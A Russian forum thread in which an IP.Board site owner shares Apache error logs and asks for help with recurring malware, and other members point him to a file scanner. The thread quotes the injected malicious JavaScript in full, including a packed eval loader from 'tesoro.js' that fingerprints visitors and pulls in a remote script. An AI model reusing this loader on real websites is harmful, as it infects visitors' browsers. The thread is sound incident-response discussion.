Атаман Posted November 28, 2013 Share Posted November 28, 2013 Раньше лог ошибок был пуст. [Thu Nov 28 00:43:44 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2722-vse-voprosy-po-forumu-prinimaiutsia-zdes/page-54 [Thu Nov 28 00:43:49 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/index.php?app=core&module=search&do=viewNewContent&search_app=forums [Thu Nov 28 00:43:49 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/index.php?app=core&module=search&do=viewNewContent&search_app=forums [Thu Nov 28 00:43:50 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/forum/136-privatnaia-komnata/ [Thu Nov 28 00:43:50 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/forum/136-privatnaia-komnata/ [Thu Nov 28 00:43:51 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2839-sniatsia-li-vam-sny-o-rabote/page-22#entry293984 [Thu Nov 28 00:43:51 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75, referer: http://сайт.ru/topic/2839-sniatsia-li-vam-sny-o-rabote/page-22#entry293984 [Thu Nov 28 02:19:20 2013] [error] [client 1.1.1.1] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++Result:+\xee\xf8\xe8\xe1\xea\xe0:+"\xc2\xfb+\xe4\xe0\xeb\xe8+\xed\xe5\xe2\xe5\xf0\xed\xfb\xe9+\xee\xf2\xe2\xe5\xf2+\xed\xe0+\xe2\xee\xef\xf0\xee\xf1+\xef\xf0\xe8+\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe0\xf6\xe8\xe8.+\xcf\xee\xef\xf0\xee\xe1\xf3\xe9\xf2\xe5+\xe5\xf9\xe5+\xf0\xe0\xe7.";+\xf2\xe5\xea\xf1\xf2\xee\xe2\xe0\xff+\xea\xe0\xef\xf7\xe0+\xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed\xe0+\xed\xe5\xe2\xe5\xf0\xed\xee;+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"roustytug";+ReCaptcha+\xe4\xe5\xf8\xe8\xf4\xf0\xee\xe2\xe0\xed\xe0;+(JS);+\xe7\xe0\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe8\xf0\xee\xe2\xe0\xeb\xe8\xf1\xfc+(\xe2\xea\xeb\xfe\xf7\xe5\xed+\xf0\xe5\xe6\xe8\xec+\xf2\xee\xeb\xfc\xea\xee+\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe0\xf6\xe8\xe8); failed, referer: http://сайт.ru/index.php++++++++++++++++++++++++++++++++++++Result:+%EE%F8%E8%E1%EA%E0:+%22%C2%FB+%E4%E0%EB%E8+%ED%E5%E2%E5%F0%ED%FB%E9+%EE%F2%E2%E5%F2+%ED%E0+%E2%EE%EF%F0%EE%F1+%EF%F0%E8+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8.+%CF%EE%EF%F0%EE%E1%F3%E9%F2%E5+%E5%F9%E5+%F0%E0%E7.%22;+%F2%E5%EA%F1%F2%EE%E2%E0%FF+%EA%E0%EF%F7%E0+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED%E0+%ED%E5%E2%E5%F0%ED%EE;+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22roustytug%22;+ReCaptcha+%E4%E5%F8%E8%F4%F0%EE%E2%E0%ED%E0;+%28JS%29;+%E7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%EB%E8%F1%FC+%28%E2%EA%EB%FE%F7%E5%ED+%F0%E5%E6%E8%EC+%F2%EE%EB%FC%EA%EE+%F0%E5%E3%E8%F1%F2%F0%E0%F6%E8%E8%29; [Thu Nov 28 04:56:49 2013] [error] [client 1.1.1.1] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:) [Thu Nov 28 05:56:27 2013] [warn] [client 1.1.1.1] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/сайт/data/www/сайт.ru/public/min/index.php on line 75 [Thu Nov 28 08:44:44 2013] [warn] [client 1.1.1.1] (104)Connection reset by peer: mod_fcgid: error reading data from FastCGI server, referer: http://сайт.ru/topic/2114-ia-segodnia/ [Thu Nov 28 08:44:44 2013] [error] [client 1.1.1.1] Premature end of script headers: 404.php, referer: http://сайт.ru/topic/2114-ia-segodnia/ Открыл Файл min/index.php Там был странный путь к iloveu.js, открыл этот файлик а там шел.;document.write(\"<scr\"+\"ipt src=\'/public/style_images/mobile_app/iloveu.js\'><\"+\"/script>\"); Удалил, вроде все работает. Кто сталкивался с таким? Link to comment Share on other sites More sharing options...
Ph-A Posted November 28, 2013 Share Posted November 28, 2013 открыл этот файлик а там шел.Думаете в одном месте шел? Кто сталкивался с таким? Надо у IPS смотреть уязвимости. p.s. Неужели считаете, что скин по умолчанию так изменен, что можно снести копирайт автора? 1 Link to comment Share on other sites More sharing options...
Атаман Posted November 28, 2013 Author Share Posted November 28, 2013 p.s. Неужели считаете, что скин по умолчанию так изменен, что можно снести копирайт автора? Задняя картинка только от автора и все, а так шаблон переделывался со стандартного. Если нужно Фисане предоставлю доступ пусть проверит). IPS уже просматриваю, спс, просто файл за 5тый месяц там был, но я вродже удалял все до единой папки оставлял uploads и смайлы + хуки моды переставлял, на сервере все пароли поменял, возможно другой админ заразил. Link to comment Share on other sites More sharing options...
Атаман Posted November 29, 2013 Author Share Posted November 29, 2013 Снова повторилось. зараженный файл tesoro.jsСодержимое: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\'\':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!\'\'.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'5 m(c){r(7.l&&7.j){2 i=7.j(\\\'S\\\')[0];2 8=7.l(\\\'R\\\');8.h(\\\'P\\\',\\\'N/O\\\');8.h(\\\'c\\\',c);i.U(8)}}5 q(3){b 3.e(\"M\")==-1}2 10=\"{Z{D?t&}f#;,~v)$\";2 X=\"V%]g%Q!,![W@11:K\";2 B=\"%%->w:z:{}]!Y+y!\";2 x=\"C#!v[i H\";2 F=\"J+{<G+\";5 u(3){b 3.e(a)!=-1}2 E=\"A,T)6]1p!12`>D}1o\";2 1n=\"~$1k)~1l~]H`%{L\";2 1j=\"~4:$](1m.~.1h`*@9\";2 1i=\"17-18 [[s=16\";2 15=\"w*n?? @13 14]:(19\";5 o(){b p.1a()}2 k=\"1f://1g.1e.3/1d\";2 a=\"a\";5 d(){2 3=p.1b.1c();r(q(3)&&u(3)&&o()){m(k)}}d();\',62,88,\'||var|ua||function||document|script_tag||win|return|src|includeCounter|indexOf|||setAttribute|head_tag|getElementsByTagName|url|createElement|includeJavascript||cond3|navigator|notChrome|if|||isWin|||nzVVMTHUln3|z1|n4||nzVVMTHUln2|ij3o||XDJOlGBk0|nzVVMTHUln4|qcf||Rc_B|vbAGL|H9||chrome|text|javascript|type||script|head|VS|appendChild|C3|B5|nzVVMTHUln1||40|nzVVMTHUln0|eB|Jg|2y|PO|XDJOlGBk4|Ww|G4T|_N|4k|javaEnabled|userAgent|toLowerCase|8bc0e1080cd5|pp|http|tozok|oa|XDJOlGBk3|XDJOlGBk2|b8rZ|VF|_a4rx|XDJOlGBk1|36|Sl5i\'.split(\'|\'),0,{})) Вот лог: [Fri Nov 29 14:38:39 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:38:39 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:39:00 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:39:00 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:39:03 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:39:03 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:39:57 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:39:57 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:40:16 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ [Fri Nov 29 14:40:16 2013] [warn] [client 11] mod_fcgid: stderr: PHP Parse error: syntax error, unexpected '"', expecting T_STRING in /var/www/tamadaplus/data/www/сайт.ру/public/min/index.php on line 75, referer: http://сайт.ру/ Подскажиту, куда рыться? так как Фтп полностью чистел, хостинг говрит что все ОК. Link to comment Share on other sites More sharing options...
Dmitriy427 Posted November 29, 2013 Share Posted November 29, 2013 Можно сюда - http://revisium.com/ai/. Но там тоже надо разобраться, а то наудаляете лишнего. P.S. Вообще, ничего особо сложного. Сканируете, открываете в браузере файл отчёа. Подозрительные файлы там будут отсортированы по категориям и степени угроз. Те, что в залитых вами дистрибутивах отсутствуют можно сразу удалять, за исключением файлов из папок загрузки, с ними нужно разбираться отдельно. Те файлы, что присутствуют в дистрибутивах, но помечены как угрозы, просто сравниваете с исходными. 1 Link to comment Share on other sites More sharing options...
Атаман Posted November 29, 2013 Author Share Posted November 29, 2013 Можно сюда - http://revisium.com/ai/. Но там тоже надо разобраться, а то наудаляете лишнего. Критические замечания. Шелл-скрипты не найдены. Link to comment Share on other sites More sharing options...
Dmitriy427 Posted November 29, 2013 Share Posted November 29, 2013 Критические замечания. Шелл-скрипты не найдены.Нужно выполнить сканирование из командной строки, вариант с запуском из браузера ограничен функционально. 1 Link to comment Share on other sites More sharing options...
Ph-A Posted November 29, 2013 Share Posted November 29, 2013 Снова повторилось.Не удивительно. Если есть взлом, то замена паролей не помогает Критические замечания. Шелл-скрипты не найдены. На VDS один сайт? P.S. В последнее время сайты на IP.Board стараюсь хостить отдельно .... 1 Link to comment Share on other sites More sharing options...
Атаман Posted November 29, 2013 Author Share Posted November 29, 2013 На VDS один сайт? P.S. В последнее время сайты на IP.Board стараюсь хостить отдельно .... Один. Link to comment Share on other sites More sharing options...
Атаман Posted December 9, 2013 Author Share Posted December 9, 2013 Нужно выполнить сканирование из командной строки, вариант с запуском из браузера ограничен функционально. Спасибо запустил скрипт по SSH, нашло пару вирусов (Под видом аватарки и тд), все почистил. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now